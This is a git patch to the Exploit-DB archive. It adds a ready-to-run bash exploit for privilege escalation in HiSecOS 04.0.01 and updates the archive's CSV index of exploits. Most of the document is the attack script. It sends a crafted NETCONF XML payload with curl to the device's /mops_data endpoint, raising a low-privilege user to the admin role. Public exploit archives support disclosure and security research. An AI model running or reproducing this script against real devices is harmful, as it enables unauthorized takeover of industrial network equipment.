From 00f6b3e7eddbae01a91589d5defa438a1475efe1 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Thu, 22 Jun 2023 00:16:26 +0000
Subject: [PATCH] DB: 2023-06-22

2 changes to exploits/shellcodes/ghdb

HiSecOS 04.0.01 - Privilege Escalation

SPIP v4.2.1 - Remote Code Execution (Unauthenticated)
SPIP v4.2.0 - Remote Code Execution (Unauthenticated)
---
 exploits/hardware/webapps/51537.sh | 55 ++++++++++++++++++++++++++++++
 files_exploits.csv                 |  3 +-
 2 files changed, 57 insertions(+), 1 deletion(-)
 create mode 100755 exploits/hardware/webapps/51537.sh

diff --git a/exploits/hardware/webapps/51537.sh b/exploits/hardware/webapps/51537.sh
new file mode 100755
index 000000000..467522f57
--- /dev/null
+++ b/exploits/hardware/webapps/51537.sh
@@ -0,0 +1,55 @@
+# Exploit Title: HiSecOS 04.0.01 - Privilege Escalation
+# Google Dork: HiSecOS Web Server Vulnerability Allows User Role Privilege Escalation
+# Date: 21.06.2023
+# Exploit Author: dreizehnutters
+# Vendor Homepage: https://dam.belden.com/dmm3bwsv3/assetstream.aspx?assetid=15437&mediaformatid=50063&destinationid=10016
+# Version: HiSecOS-04.0.01 or lower
+# Tested on: HiSecOS-04.0.01
+# CVE: BSECV-2021-07
+
+#!/bin/bash
+
+if [[ $# -lt 3 ]]; then
+  echo "Usage: $0 <IP> <USERNAME> <PASSWORD>"
+  exit 1
+fi
+
+target="$1"
+user="$2"
+pass="$3"
+
+# Craft basic header
+auth=$(echo -ne "$user:$pass" | base64)
+
+# Convert to ASCII hex
+blob=$(printf "$user" | xxd -ps -c 1)
+
+# Generate XML payload ('15' -> admin role)
+gen_payload() {
+  cat <<EOF
+<rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:x-mops:1.0 ../mops.xsd" message-id="20">
+  <mibOperation xmlns="urn:x-mops:1.0">
+    <edit-config>
+      <MIBData>
+        <MIB name="HM2-USERMGMT-MIB">
+          <Node name="hm2UserConfigEntry">
+            <Index>
+              <Attribute name="hm2UserName">$blob</Attribute>
+            </Index>
+            <Set name="hm2UserAccessRole">15</Set>
+          </Node>
+        </MIB>
+      </MIBData>
+    </edit-config>
+  </mibOperation>
+</rpc>
+EOF
+}
+
+curl -i -s -k -X POST \
+  -H "content-type: application/xml" \
+  -H "authorization: Basic ${auth}" \
+  --data-binary "$(gen_payload)" \
+  "https://${target}/mops_data"
+
+echo "[*] $user is now an admin"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 1f064af0c..5da1d43da 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -4420,6 +4420,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45231,exploits/hardware/webapps/45231.rb,"Hikvision IP Camera 5.4.0 - User Enumeration (Metasploit)",2018-08-21,Alfie,webapps,hardware,,2018-08-21,2018-08-21,0,,"Metasploit Framework (MSF)",,,,
 27402,exploits/hardware/webapps/27402.txt,"Hikvision IP Cameras 4.1.0 b130111 - Multiple Vulnerabilities",2013-08-07,"Core Security",webapps,hardware,,2013-08-07,2013-08-07,1,CVE-2013-4977;CVE-2013-4976;CVE-2013-4975;OSVDB-96006;OSVDB-96005;OSVDB-96004,,,,,http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities
 50441,exploits/hardware/webapps/50441.py,"Hikvision Web Server Build 210702 - Command Injection",2021-10-25,bashis,webapps,hardware,,2021-10-25,2021-10-25,0,CVE-2021-36260,,,,,
+51537,exploits/hardware/webapps/51537.sh,"HiSecOS 04.0.01 - Privilege Escalation",2023-06-21,dreizehnutters,webapps,hardware,,2023-06-21,2023-06-21,0,,,,,,
 48902,exploits/hardware/webapps/48902.sh,"HiSilicon Video Encoders - Full admin access via backdoor password",2020-10-19,"Alexei Kojenov",webapps,hardware,,2020-10-19,2020-10-19,0,CVE-2020-24215,,,,,
 48900,exploits/hardware/webapps/48900.sh,"HiSilicon Video Encoders - RCE via unauthenticated command injection",2020-10-19,"Alexei Kojenov",webapps,hardware,,2020-10-19,2020-10-19,0,CVE-2020-24217,,,,,
 48901,exploits/hardware/webapps/48901.sh,"HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware",2020-10-19,"Alexei Kojenov",webapps,hardware,,2020-10-19,2020-10-19,0,CVE-2020-24217,,,,,
@@ -29966,7 +29967,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40595,exploits/php/webapps/40595.txt,"SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution",2016-10-20,Sysdream,webapps,php,80,2016-10-20,2016-10-20,1,CVE-2016-7998,,,,http://www.exploit-db.comSPIP-v3.1.2.zip,
 9448,exploits/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to '.XML' File",2009-08-18,Kernel_Panik,webapps,php,,2009-08-17,,1,CVE-2009-3041;OSVDB-57510,,,,,
 33425,exploits/php/webapps/33425.py,"SPIP CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation",2014-05-19,"Gregory Draperi",webapps,php,80,2014-05-19,2014-05-21,0,CVE-2013-2118;OSVDB-93683,,,,http://www.exploit-db.comSPIP-v3.0.8.zip,
-51536,exploits/php/webapps/51536.py,"SPIP v4.2.1 - Remote Code Execution (Unauthenticated)",2023-06-20,AK,webapps,php,,2023-06-20,2023-06-20,0,CVE-2023-27372,,,,,
+51536,exploits/php/webapps/51536.py,"SPIP v4.2.0 - Remote Code Execution (Unauthenticated)",2023-06-20,nuts7,webapps,php,,2023-06-20,2023-06-21,1,CVE-2023-27372,,,,,
 10408,exploits/php/webapps/10408.txt,"SpireCMS 2.0 - SQL Injection",2009-12-13,"Dr.0rYX & Cr3W-DZ",webapps,php,,2009-12-12,,1,,,,,,
 34321,exploits/php/webapps/34321.txt,"Spitfire 1.0.381 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-15,"Nijel the Destroyer",webapps,php,,2010-07-15,2014-08-12,1,,,,,,https://www.securityfocus.com/bid/41701/info
 35522,exploits/php/webapps/35522.txt,"Spitfire 1.0.3x - 'cms_username' Cross-Site Scripting",2011-03-29,"High-Tech Bridge SA",webapps,php,,2011-03-29,2014-12-15,1,,,,,,https://www.securityfocus.com/bid/47077/info